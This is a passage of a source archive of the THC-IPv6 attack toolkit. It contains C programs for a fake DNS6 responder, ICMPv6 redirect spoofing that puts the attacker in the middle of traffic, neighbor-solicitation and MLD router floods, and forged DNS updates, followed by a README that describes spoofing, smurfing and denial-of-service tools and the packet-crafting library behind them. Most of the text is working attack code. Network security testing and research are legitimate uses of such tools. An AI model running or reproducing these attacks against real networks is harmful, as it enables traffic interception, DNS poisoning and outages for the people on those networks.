  if (argc >= 4 && argv[3] != NULL)
    ip6 = thc_resolve6(argv[3]);
  else
    ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);

  if (mac6 == NULL || ip6 == NULL) {
    fprintf(stderr, "Error: invalid interface %s or invalid src mac/IP set\n", interface);
    exit(-1);
  }

  /* argv[2] is the address placed in every answer. */
  routerip6 = thc_resolve6(argv[2]);
  if (routerip6 == NULL) {
    fprintf(stderr, "Error: fake IPv6 answer option is invalid: %s\n", argv[2]);
    exit(-1);
  }
  /* The next two checks repeat conditions already handled above. */
  if (ip6 == NULL) {
    fprintf(stderr, "Error: fake answer IPv6 argument is invalid: %s\n", argv[3]);
    exit(-1);
  }
  if (mac6 == NULL) {
    fprintf(stderr, "Error: mac address in invalid\n");
    exit(-1);
  }

  if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and (dst port 53 or dst port 5353)")) == NULL) {
    fprintf(stderr, "Error: could not open interface %s in promisc mode\n", interface);
    exit(-1);
  }
/* if ((s = thc_bind_udp_port(53)) < 0) { fprintf(stderr, "Warning: could not bind to 53/udp\n"); } else { thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")); fcntl(s, F_SETFL, O_NONBLOCK); } if ((t = thc_bind_udp_port(5353)) < 0) { fprintf(stderr, "Error: could not bind to 5353/udp\n"); exit(-1); } else { thc_bind_multicast_to_socket(t, interface, thc_resolve6("ff02::1:3")); fcntl(t, F_SETFL, O_NONBLOCK); } if ((u = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) { perror("Error:"); exit(-1); } */

  /* DNS header template; bytes 0..1 (transaction id) are filled in per query. */
  memset(mybuf, 0, sizeof(mybuf));
  mybuf[2] = 0x81;              // flags
  mybuf[3] = 0x80;
  mybuf[5] = 1;                 // queries
  mybuf[7] = 1;                 // replies
  // no RRs, no add R
  mlen = 12;

  /* Answer record appended after the copied question. */
  memset(mybuf2, 0, sizeof(mybuf2));
  mybuf2[0] = 0xc0;             // name
  mybuf2[1] = 0x0c;
  mybuf2[3] = 0x1c;             // type aaaa
  mybuf2[5] = 0x01;             // class IN
  mybuf2[8] = 0x04;             // ttl (1024 seconds == 0x00000400)
  mybuf2[11] = 0x10;            // length 16
  memcpy(mybuf2 + 12, routerip6, 16);

  printf("Starting fake dns6 server on %s for %s (Press Control-C to end) ...\n\n", interface, argv[2]);
  while (1)
    thc_pcap_check(p, (char *) check_packets, NULL);
/* while(1) { memset((char*)&from, 0, sizeof(from)); memset(&iov, 0, sizeof(iov)); memset(&mhdr, 0, sizeof(mhdr)); iov.iov_base = rdatabuf; iov.iov_len = sizeof(rdatabuf); mhdr.msg_name = &from; mhdr.msg_namelen = sizeof(from); mhdr.msg_iov = &iov; mhdr.msg_iovlen = 1; mhdr.msg_control = (caddr_t)cmsgbuf; mhdr.msg_controllen = sizeof(cmsgbuf); if ( (s >= 0 && (len = recvmsg(s, &mhdr, 0)) > 0) || (t >= 0 && (len = recvmsg(t, &mhdr, 0)) > 0)) { fromlen = mhdr.msg_namelen; if (debug) thc_dump_data(rdatabuf, len, "Received Packet"); ddst.sin6_addr = ((struct sockaddr_in6 *)mhdr.msg_name)->sin6_addr; ptr2 = thc_ipv62notation((char*)&ddst.sin6_addr); // data in rdatabuf, ipv6string in ptr2 // . // . } else usleep(200); } */
  return 0;                     // never reached
}
thc-ipv6-2.5/flood_mldrouter6.c0000644000000000000000000000460612251022436015153 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the local network with MLD router advertisements.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6]; unsigned char *dst = thc_resolve6("ff02::6a"), *dstmac = thc_get_multicast_mac(dst); int i; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } memset(buf, 0, sizeof(buf)); mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; printf("Starting to flood network with MLD router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_ROUTERADV, 15, 0x00300006, buf, 0, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, 
dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/README0000644000000000000000000003143612256500740012406 0ustar rootroot THC-IPV6-ATTACK-TOOLKIT (c) 2005-2013 vh@thc.org www.thc.org Licensed under AGPLv3 (see LICENSE file) INTRODUCTION ============ This code was inspired when I got into touch with IPv6, learned more and more about it - and then found no tools to play (read: "hack") around with. First I tried to implement things with libnet, but then found out that the IPv6 implementation is only partial - and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library. LIMITATIONS =========== This code currently only runs on: - Linux 2.6.x or newer (because of /proc usage) - Ethernet But this means for all linux guys that it will work for 98% of your use cases. Patches are welcome! (add "antispam" in the subject line to get through my anti-spam protection, otherwise the email will bounce) THE TOOLS ========= The THC IPV6 ATTACK TOOLKIT comes already with lots of effective attacking tools: - parasite6: ICMPv6 neighbor solitication/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite) - alive6: an effective alive scanng, which will detect all systems listening to this address - dnsdict6: parallized DNS IPv6 dictionary bruteforcer - fake_router6: announce yourself as a router on the network, with the highest priority - redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever ICMPv6 redirect spoofer - toobig6: mtu decreaser with the same intelligence as redir6 - detect-new-ip6: detect new IPv6 devices which join the network, you can run a script to automatically scan these systems etc. 
- dos-new-ip6: detect new IPv6 devices and tell them that their chosen IP collides on the network (DOS).
- trace6: very fast traceroute6 which supports ICMP6 echo request and TCP-SYN
- flood_router6: flood a target with random router advertisements
- flood_advertise6: flood a target with random neighbor advertisements
- fuzz_ip6: fuzzer for IPv6
- implementation6: performs various implementation checks on IPv6
- implementation6d: listen daemon for implementation6 to check behind a FW
- fake_mld6: announce yourself in a multicast group of your choice on the net
- fake_mld26: same but for MLDv2
- fake_mldrouter6: fake MLD router messages
- fake_mipv6: steal a mobile IP to yours if IPSEC is not needed for authentication
- fake_advertiser6: announce yourself on the network
- smurf6: local smurfer
- rsmurf6: remote smurfer, known to work only against linux at the moment
- exploit6: known IPv6 vulnerabilities to test against a target
- denial6: a collection of denial-of-service tests against a target
- thcping6: sends a hand crafted ping6 packet
- sendpees6: a tool by willdamn@gmail.com, which generates neighbor solicitation requests with a lot of CGAs (crypto stuff ;-) to keep the CPU busy. nice.

and about 25 more tools for you to discover :-)

Just run the tools without options and they will give you help and show the command line options.

THE LIBRARY
===========
The library thc-ipv6-lib.c is the heart and soul of all tools - and those you may want to write.
Implementation is so simple, it's usually just 2-4 lines to create a complete IPv6/ICMPv6 packet with the content of your choice.
The basic structure you use is (thc_ipv6_hdr *) e.g.
  thc_ipv6_hdr *my_ipv6_packet;
  int my_ipv6_packet_len;
and you will never have to play with its options/fields.
Whenever you want to build an IPv6 packet, you just write:
  my_ipv6_packet = thc_create_ipv6_extended(interface, prefer, &my_ipv6_packet_len, src6, dst6, ttl, length, label, class, version);
If something fails, it returns NULL (only if my_ipv6_packet_len or dst6 do not exist or malloc fails).
The options to thc_create_ipv6_extended are:
  (char*) interface - the interface on which you want to send out the packet
  (int) prefer - either PREFER_LINK (to use the link local address) or PREFER_HOST to use a host IPv6 address, and PREFER_GLOBAL to use a public (internet) IP6 address (default)
  (int *) &my_ipv6_packet_len - the size of the packet which will be created
  (unsigned char*) src6 - the source IP6 (OPTIONAL - will be selected if NULL)
  (unsigned char*) dst6 - the destination IP6 (in network format, 16 bytes long) usually the result of thc_resolve6("ipv6.google.com");
  (int) ttl - the ttl of the packet (OPTIONAL - 0 will set this to 255)
  (int) length - the length which will be set in the header (OPTIONAL - 0 = real length)
  (int) label - the flow label (0 is fine)
  (int) class - the class of the packet (0 is fine)
  (int) version - the IP6 version (OPTIONAL - 0 will set this to version 6)
It returns NULL on errors or a malloc'ed structure on success. free() it once you are done with it.
Now you can set extension headers on top of it:
  thc_add_hdr_route(my_ipv6_packet, &my_ipv6_packet_len, routers, routerptr);
  thc_add_hdr_fragment(my_ipv6_packet, &my_ipv6_packet_len, offset, more_frags, id);
  thc_add_hdr_dst(my_ipv6_packet, &my_ipv6_packet_len, buf, buflen);
  thc_add_hdr_hopbyhop(my_ipv6_packet, &my_ipv6_packet_len, buf, buflen);
  thc_add_hdr_nonxt(my_ipv6_packet, &my_ipv6_packet_len, hdropt);
  thc_add_hdr_misc(my_ipv6_packet, &my_ipv6_packet_len, type, len, buf, buflen);

The functions explained:
_route: Add a Routing Forwarding Header (like IP Source Routing)
  (int) routers - the number of routers in routerptr
  (char**) routerptr - a *char[routers + 1] struct with router destinations in network format. See alive6.c for an example.
_fragment: Add a Fragment Header
  (int) offset - the offset at which the data should be written (note: put the offset location in bytes here, not in byte octets)
  (int) more_frags - set to 0 if it is the last fragment, 1 on all others
  (int) id - an ID for the packet (same for all fragments)
_dst: Add a Destination Options Header
  (char*) buf - a char buffer. you have to control this buffer yourself with what you want to write into it.
  (int) buflen - the length of buf
_hopbyhop: Add a Hop-By-Hop Header
  (char*) buf - a char buffer. you have to control this buffer yourself with what you want to write into it.
  (int) buflen - the length of buf
_nonxt: Specify that there will be no following headers whatsoever
  (int) hdropt - this option is currently ignored
_misc: Specify a miscellaneous header. Use this if you want to design an invalid or non-existing extension header.
  (int) type - The type ID to specify the header as
  (int) len - The length to advertise the header as (OPTIONAL - -1 sets this to the correct value)
  (char*) buf - a char buffer. you have to control this buffer yourself with what you want to write into it.
  (int) buflen - the length of buf
These functions return (int) 0 on success and -1 on error.
Finally you can add the stream or dgram headers.
  thc_add_icmp6(my_ipv6_packet, &my_ipv6_packet_len, type, code, flags, buf, buflen, checksum);
  thc_add_tcp(my_ipv6_packet, &my_ipv6_packet_len, source_port, destination_port, sequence_number, ack_number, flags, window_size, urgent_pointer, options, options_length, data, data_length);
  thc_add_udp(my_ipv6_packet, &my_ipv6_packet_len, source_port, destination_port, checksum, data, data_length);
  thc_add_data6(my_ipv6_packet, &my_ipv6_packet_len, type, buf, buflen);

_icmp6: Add an ICMP6 packet header
  (int) type: the ICMP6 type
  (int) code: the ICMP6 code
  (int) flags: the ICMP6 flags
  (char*) buf - a char buffer. you have to control this buffer yourself with what you want to write into it.
  (int) buflen - the length of buf
_tcp|_udp: Add a TCP or UDP header
  (ushort) source_port: source port
  (ushort) destination_port: destination port
  (uint) sequence_number: TCP sequence number
  (uint) ack_number: TCP acknowledgement number
  (ushort) checksum: UDP checksum, 0 = generate checksum (for TCP the checksum is always calculated)
  (uchar) flags: TCP flags: TCP_SYN, TCP_ACK, TCP_FIN, TCP_RST, TCP_PSH, ...
  (uint) window_size: TCP window size
  (uint) urgent_pointer: TCP urgent pointer (usually 0)
  (char*) options: TCP options buffer, can be NULL
  (uint) options_length: the length of the TCP options buffer
  (char*) data: the data the protocol carries
  (uint) data_length: the length of the data buffer
_data6: Add a miscellaneous header
  (int) type: the protocol ID
  (char*) buf - a char buffer. you have to control this buffer yourself with what you want to write into it.
  (int) buflen - the length of buf
These functions return (int) 0 on success and -1 on error.

Once you are done, you create and send the packet.
  thc_generate_pkt(interface, srcmac, dstmac, my_ipv6_packet, &my_ipv6_packet_len);
  thc_send_pkt(interface, my_ipv6_packet, &my_ipv6_packet_len);
or combined into one function:
  thc_generate_and_send_pkt(interface, srcmac, dstmac, my_ipv6_packet, &my_ipv6_packet_len);

thc_generate_and_send_pkt: This generates the real and final IPv6 packet and then sends it.
  (char*) interface - the interface to send the packet on
  (unsigned char*) srcmac - the source mac to use (in network format) (OPTIONAL, the real mac is used if NULL)
  (unsigned char*) dstmac - the destination mac to use (in network format) (OPTIONAL, the real mac is looked up if NULL)
The thc_generate_pkt and thc_send_pkt together provide the same functionality. You usually use these only if you do something like
  thc_generate_pkt(...);
  while(1)
    thc_send_pkt(...);
These functions return (int) 0 on success and -1 on error.

When you are done, free the memory with:
  thc_destroy_packet(my_ipv6_packet);

There are some important helper functions you will need:
  thc_resolve6(destinationstring);
    This resolves the IPv6 address or DNS name to an IPv6 network address. Use this for dst6 in thc_create_ipv6_extended(). The result has to be free'd when not needed anymore.
  thc_inverse_packet(my_ipv6_packet, &my_ipv6_packet_len);
    This clever function switches source and destination address, exchanges the ICMP header type (ECHO REQUEST -> ECHO REPLY etc.) and recalculates the checksum.
If you don't have an idea what this might be useful for, go and play with your xbox :-)

If you just want to do it very fast, there are some predefined ICMPv6 creator functions which send ICMPv6 packets in just one line of code:
  thc_ping6(interface, src, dst, size, count);
  thc_neighboradv6(interface, src, dst, srcmac, dstmac, flags, target);
  thc_neighborsol6(interface, src, dst, target, srcmac, dstmac);
  thc_routeradv6(interface, src, dst, srcmac, default_ttl, managed, prefix, prefixlen, mtu, lifetime);
  thc_routersol6(interface, src, dst, srcmac, dstmac);
  thc_toobig6(interface, src, srcmac, dstmac, mtu, my_ipv6_packet, my_ipv6_packet_len);
  thc_paramprob6(interface, src, srcmac, dstmac, code, pointer, my_ipv6_packet, my_ipv6_packet_len);
  thc_unreach6(interface, src, srcmac, dstmac, icmpcode, my_ipv6_packet, my_ipv6_packet_len);
  thc_redir6(interface, src, srcmac, dstmac, newrouter, newroutermac, my_ipv6_packet, my_ipv6_packet_len);
  thc_send_as_fragment6(interface, src, dst, type, buf, buflen, frag_len);
These do what you expect them to do, so I am too lazy^H^H^H^H^Hbusy to describe it in more detail.

The following functions allocate memory for the result pointer, so remember to free the result pointers from these functions once you do not need them anymore:
  thc_ipv6_dummymac()
  thc_ipv62notation()
  thc_ipv62string()
  thc_string2ipv6()
  thc_string2notation()
  thc_resolve6()
  thc_get_own_ipv6()
  thc_get_own_mac()
  thc_get_multicast_mac()
  thc_get_mac()
  thc_lookup_ipv6_mac()
  thc_look_neighborcache()
  thc_generate_key()
  thc_generate_cga()
  thc_generate_rsa()

It helps a lot if you take a look at example usages. The best ones are the tools from the thc-ipv6 package, especially implementation6.c and fake_*6.c - have fun, and send back code, so the community can further build on it.

DETECTION
=========
Most tools can easily be detected by an IDS or specialized detection software. This is done on purpose to make rogue usage detection easier.
The tools either specify a fixed packet signature, or generically sniff for packets (e.g. therefore also answering to ICMPv6 neighbor solitications which are sent to a non-existing mac, and are therefore very easy to detect). If you dont want this, change the code. PATCHES, BUGS, HINTS, etc. ========================== Send them to vh (at) thc (dot) org (and add "antispam" to the subject line) Have fun! thc-ipv6-2.5/redirsniff6.c0000644000000000000000000001115612251022440014077 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, buf[16], mac[16] = "", *realownmac; unsigned char *mac6 = mac, *src6, *dest6, *oldrouter6, *newrouter6, *self6, *fakemac; char *interface; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface victim-ip destination-ip original-router [new-router [new-router-mac]]\n\n", prg); printf("Implant a route into victim-ip, which redirects all traffic to destination-ip to\n"); printf("new-router. This is done on all traffic that flows by that matches\n"); printf("victim->target. You must know the router which would handle the route.\n"); printf("If the new-router/-mac does not exist, this results in a DOS.\n"); printf("You can supply a wildcard ('*') for victim-ip and/or destination-ip.\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { char *ptr, *ptr2; // packet is to the real router, and is not from us? if (memcmp(realownmac, data + 6, 6) == 0 || memcmp(fakemac, data, 6) != 0) return; // check that source and dest are routed // same network? if (memcmp(data + 14 + 8, data + 14 + 8 + 16, 8) == 0) return; // dst fe.. or ff.. or 00? if (data[14 + 8 + 16] >= 0xfe || data[14 + 8 + 16] == 0) return; // src fe.. or ff.. or 00? if (data[14 + 8 + 16] >= 0xfe || data[14 + 8 + 16] == 0) return; if (src6 != NULL) { // victim wildcard? 
if not, check src if (memcmp(src6, data + 14 + 8, 16) != 0) return; } else { // victim wildcard - we have to ensure that the source is local -> hop count! if (data[14 + 7] != 64 && data[14 + 7] != 128 && data[14 + 7] != 255) return; } if (dest6 != NULL) // destination wildcard? if not, check dst if (memcmp(dest6, data + 14 + 8 + 16, 16) != 0) return; thc_redir6(interface, oldrouter6, fakemac, (unsigned char*)data + 6, newrouter6, mac6, (unsigned char*)data + 14, header->caplen - 14); ptr = thc_ipv62notation((unsigned char*)data + 14 + 8); ptr2 = thc_ipv62notation((unsigned char*)data + 14 + 8 + 16); printf("Sent ICMPv6 redirect for %s -> %s\n", ptr, ptr2); free(ptr); free(ptr2); } int main(int argc, char *argv[]) { int rawmode = 0, offset = 14; char string[256] = "ip6"; if (argc < 5 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; if ((src6 = thc_resolve6(argv[2])) == NULL) { if (strcmp(argv[2], "*") != 0) { fprintf(stderr, "Error: victim-ip is not a valid IPv6 address or '*': %s\n", argv[2]); exit(-1); } } if ((dest6 = thc_resolve6(argv[3])) == NULL) { if (strcmp(argv[3], "*") != 0) { fprintf(stderr, "Error: destination-ip is not a valid IPv6 address or '*': %s\n", argv[3]); exit(-1); } } if ((oldrouter6 = thc_resolve6(argv[4])) == NULL) { fprintf(stderr, "Error: old-router is not a valid IPv6 address: %s\n", argv[4]); exit(-1); } if (argc >= 6) { if ((newrouter6 = thc_resolve6(argv[5])) == NULL) { fprintf(stderr, "Error: new-router is not a valid IPv6 address: %s\n", argv[5]); exit(-1); } } else newrouter6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); /* Spoof source mac */ if ((self6 = thc_get_own_ipv6(interface, oldrouter6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: could not get own IP address to contact original-router\n"); exit(-1); } if ((fakemac = thc_get_mac(interface, self6, oldrouter6)) == NULL) { 
fprintf(stderr, "Error: could not resolve mac address for original-router\n"); free(self6); exit(-1); } mac6 = mac; if (argc >= 7) sscanf(argv[6], "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); realownmac = thc_get_own_mac(interface); if (src6 != NULL) { strcat(string, " and src "); strcat(string, thc_ipv62notation(src6)); } if (dest6 != NULL) { strcat(string, " and dst "); strcat(string, thc_ipv62notation(dest6)); } printf("Starting sniffer to get traffic to be redirected (press Control-C to end) ...\n"); return thc_pcap_function(interface, string, (char *) intercept, 1, NULL); } thc-ipv6-2.5/flood_solicitate6.c0000644000000000000000000000554512251022437015302 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [target]\n\n", prg); printf("Flood the network with neighbor solicitations.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6; unsigned char buf[24]; unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst), *target = NULL; int i; unsigned char *pkt = NULL; int pkt_len = 0, rawmode = 0, count = 0; if (argc < 2 || argc > 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", 
interface); exit(-1); } if (argc > 2) if ((target = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: Can not resolve %s\n", argv[2]); exit(-1); } ip6 = malloc(16); mac[0] = 0x00; mac[1] = 0x18; memset(ip6, 0, 16); ip6[0] = 0xfe; ip6[1] = 0x80; ip6[8] = 0x02; ip6[9] = mac[1]; ip6[11] = 0xff; ip6[12] = 0xfe; memset(buf, 0, sizeof(buf)); buf[16] = 1; buf[17] = 1; buf[18] = mac[0]; buf[19] = mac[1]; if (target != NULL) memcpy(buf, target, 16); printf("Starting to flood network with neighbor solicitations on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { // use previous src as target if we did not specify a target if (target == NULL) memcpy(buf, ip6, 16); for (i = 2; i < 6; i++) mac[i] = rand() % 256; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; memcpy(&buf[20], mac + 2, 4); count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, buf, sizeof(buf), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. 
%d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; } thc-ipv6-2.5/fake_dnsupdate6.c0000644000000000000000000000665012251022435014730 0ustar rootroot#include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" void noreply(int signo) { printf("Result: DNS server timeout\n"); exit(1); } int main(int argc, char **argv) { char buf[1024], *dst, *host, *domain, *ptr, *ptr2; char b1[] = { 0x28, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00 }; char b2[] = { 0x00, 0x06, 0x00, 0x01 }; char b3[] = { 0xc0, 0x0c, 0x00, 0x1c, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char b4[] = { 0xc0, 0x00, 0x00, 0x1c, 0x00, 0x01, 0x00, 0x01, 0x51, 0x80, 0x00, 0x10 }; struct addrinfo *ai; struct addrinfo hints; int sock, pid = getpid(), dlen = 0, i = 0, len; if (argc != 4) { printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE); printf("Syntax: %s dns-server full-qualified-host-dns-name ipv6address\n\n", argv[0]); printf("Example: %s dns.test.com myhost.sub.test.com ::1\n\n", argv[0]); exit(0); } if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]); memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_DGRAM; hints.ai_protocol = IPPROTO_UDP; if (getaddrinfo(argv[1], "53", &hints, &ai) != 0) { fprintf(stderr, "Error: unable to resolve dns server %s\n", argv[1]); exit(-1); } if ((sock = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol)) < 0) { fprintf(stderr, "Error: unable to resolve dns server %s\n", argv[1]); exit(-1); } if (connect(sock, ai->ai_addr, ai->ai_addrlen) < 0) { fprintf(stderr, "Error: unable to connect to dns server %s\n", argv[1]); exit(-1); } freeaddrinfo(ai); if ((dst = thc_resolve6(argv[3])) == NULL) { fprintf(stderr, "Error: not a valid IPv6 
address: %s\n", argv[3]); exit(-1); } memcpy(buf, (char *) &pid + _TAKE2, 2); memcpy(buf + 2, b1, sizeof(b1)); i = 2 + sizeof(b1); // domain-encoded-here foo.com == \x03foo\x03com\x00 == dlen host = argv[2]; if ((domain = index(argv[2], '.')) == NULL) { fprintf(stderr, "Error: not a valid full-qualified-host-name: %s\n", argv[2]); exit(-1); } *domain = 0; ptr = domain; do { ptr++; if ((ptr2 = index(ptr, '.')) != NULL) *ptr2 = 0; len = strlen(ptr); buf[i++] = len; memcpy(buf + i, ptr, len); i += len; dlen += (len + 1); ptr = ptr2; } while (ptr != NULL); buf[i++] = 0; dlen++; memcpy(buf + i, b2, sizeof(b2)); i += sizeof(b2); // host-encoded len = strlen(host); buf[i++] = len; memcpy(buf + i, host, len); i += len; memcpy(buf + i, b3, sizeof(b3)); i += sizeof(b3); b4[1] = dlen + 16; memcpy(buf + i, b4, sizeof(b4)); i += sizeof(b4); memcpy(buf + i, dst, 16); i += 16; send(sock, buf, i, 0); signal(SIGALRM, noreply); alarm(5); memset(buf, 0, sizeof(buf)); recv(sock, buf, sizeof(buf), 0); alarm(0); if ((buf[3] & 9) == 9) { printf("Result: server not responsible for zone or update not supported\n"); exit(1); } else if ((buf[3] & 15) == 1) { printf("Result: authentication required, update attempt failed\n"); exit(1); } else if ((buf[3] & 1) == 1) { printf("Result: unknown error, update attempt failed\n"); exit(1); } else printf("Result: update successful!\n"); close(sock); return 0; } thc-ipv6-2.5/dnsdict6.c0000644000000000000000000007011712251022434013401 0ustar rootroot/* * dnsdict6 is actually based on dnsmap with four changes: * - threaded (way faster) * - bugfixes * - ipv6 support * - simplified options * - srv support * have fun! 
van Hauser / THC, May 2013 * * ** dnsmap - DNS Network Mapper by pagvac * ** Copyright (C) 2013 gnucitizen.org */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #include "dnsdict6.h" // built-in subdomains list //#define DEBUG 1 #define FALSE 0 #define TRUE 1 #define MAXSTRSIZE 200 #define DEFAULT_THREADS 8 #define MAX_THREADS 32 #define MAX_UNIQUE 4096 #define MAX_WCARD 8 char domain[256]; unsigned short int filtIPcount = 0, milliseconds = 10, ipCount = 0, ipCount4; unsigned short int intIPcount = 0, found = 0, txtResults = FALSE, do4 = 0, do6 = 1, dof = 0, dosrv = 0; unsigned short int csvResults = FALSE, delay = FALSE, ucount = 0, ucount4 = 0, ucountsrv = 0, ucountsrvs = 0, wcard = 0, wcard4 = 0; char wildcardIpStr[MAX_WCARD][INET_ADDRSTRLEN], wildcardIpStr4[MAX_WCARD][16], unique[MAX_UNIQUE][INET_ADDRSTRLEN], unique4[MAX_UNIQUE][16]; char **sub = (char **) sub_medium, *type = ""; char ***lists; unsigned short int listptr[MAX_THREADS]; void *help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-d4] [-s|-m|-l|-x|-u] [-t THREADS] [-D] domain [dictionary-file]\n\n", prg); printf("Enumerates a domain for DNS entries, it uses a dictionary file if supplied\n"); printf("or a built-in list otherwise. 
This tool is based on dnsmap by gnucitizen.org.\n\n"); printf("Options:\n"); // printf(" -6 do NOT dump IPv6 addresses\n"); printf(" -4 do also dump IPv4 addresses\n"); printf(" -t NO specify the number of threads to use (default: %d, max: %d).\n", DEFAULT_THREADS, MAX_THREADS); printf(" -D dump the selected built-in wordlist, no scanning.\n"); printf(" -d display IPv6 information on NS and MX DNS domain information.\n"); printf(" -S perform SRV service name guessing\n"); printf(" -[smlxu] choose the dictionary size by -s(mall=100), -m(edium=1419) (DEFAULT)\n"); printf(" -l(arge=2601), -x(treme=5886) or -u(ber=16724)\n"); printf("\n"); exit(-1); } // return true if the domain seems valid (NS entry exists) int verifyDomain(char *dom) { unsigned char vbuf[1024]; if (res_query(dom, ns_c_in, ns_t_ns, vbuf, sizeof(vbuf)) >= 0) return TRUE; return FALSE; } // return true if domain wildcards are enabled unsigned short int wildcarDetect(char *dom) { char s[MAXSTRSIZE] = ""; unsigned short int i = 0, j, k, max = 8; struct addrinfo hints, *res, *p; void *addr, *addr4; int status; char ipv6str[INET6_ADDRSTRLEN]; char ipv4str[16]; struct sockaddr_in6 *ipv6, *q; struct sockaddr_in *ipv4, *q4; memset(&hints, 0, sizeof hints); hints.ai_family = dof; // AF_INET or AF_INET6 to force version srand(time(NULL)); // generate up to random digits subdomain string // e.g. 
